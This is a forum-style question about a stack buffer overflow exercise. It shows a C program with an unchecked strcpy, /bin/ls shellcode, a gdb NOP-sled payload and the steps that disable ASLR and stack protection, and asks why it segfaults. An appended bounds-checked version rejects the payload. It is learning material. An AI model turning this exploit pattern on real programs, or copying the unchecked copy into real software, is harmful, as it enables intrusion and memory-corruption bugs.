I am trying to learn how to use a simple streaming method in Backtrack Linux.
Here is my C program:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        char buffer[500];
        if (argc == 2) {
            strcpy(buffer, argv[1]); // vulnerable function
        }
        return 0;
    }
This is the shellcode I am using, which corresponds to a simple /bin/ls:

    \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
I embed this shellcode in gdb using the following command:

    run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')
When I run through the application, it generates SIGSEGV on the final `ret` instruction. At this point EIP is correctly set to `0xffffd30c`. This address is addressable and contains a series of NOPs, followed by my shellcode, as shown in the payload.
I disabled ASLR with

    sudo echo 0 > /proc/sys/kernel/randomize_va_space

and also compiled my binary with the `-fno-stack-protector` option.
Any idea what is the reason for SIGSEGV?
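Since the `strcpy()` in the program above copies `argv[1]` with no length check, here is a bounds-checked version as an added example (my code, not the asker's): it refuses any argument that does not fit in the 500-byte buffer, and a helper shows that an input sized like the payload in the question (331 NOPs + 44 shellcode bytes + 35 copies of a 4-byte address = 515 bytes) is exactly what it rejects. The function names `copy_checked`, `arg_of_length_fits` and `question_payload_fits` are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500   /* same buffer size as the program in the question */

/* Hardened replacement for the strcpy() call (hypothetical name): copies arg
 * into buffer only if it fits together with its terminating NUL.  Returns 0
 * on success and -1 if the argument is rejected (buffer is left untouched). */
int copy_checked(char *buffer, size_t buf_size, const char *arg) {
    /* Look for the NUL within the first buf_size bytes only; C11 guarantees
     * memchr stops at the first match, so a short argument is not over-read. */
    const char *nul = memchr(arg, '\0', buf_size);
    if (nul == NULL) {
        return -1;                   /* no NUL within buf_size: too long */
    }
    memcpy(buffer, arg, (size_t)(nul - arg) + 1);   /* includes the NUL */
    return 0;
}

/* Builds a constructed argument of n bytes ('A's standing in for the NOP
 * sled, shellcode and return addresses) and reports whether copy_checked()
 * accepts it into a BUF_SIZE buffer: 1 = accepted, 0 = rejected. */
int arg_of_length_fits(size_t n) {
    static char arg[1024];
    char buffer[BUF_SIZE];
    if (n >= sizeof(arg)) return 0;  /* outside what this helper models */
    memset(arg, 'A', n);
    arg[n] = '\0';
    return copy_checked(buffer, sizeof(buffer), arg) == 0;
}

/* The payload in the question is 331 NOPs + 44 shellcode bytes + 35 copies
 * of a 4-byte address = 515 bytes, which cannot fit in a 500-byte buffer. */
int question_payload_fits(void) {
    return arg_of_length_fits(331 + 44 + 4 * 35);
}

int main(int argc, char **argv) {
    char buffer[BUF_SIZE];
    if (argc == 2) {
        if (copy_checked(buffer, sizeof(buffer), argv[1]) != 0) {
            fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
            return 1;
        }
        printf("copied %zu bytes\n", strlen(buffer));
    }
    return 0;
}
```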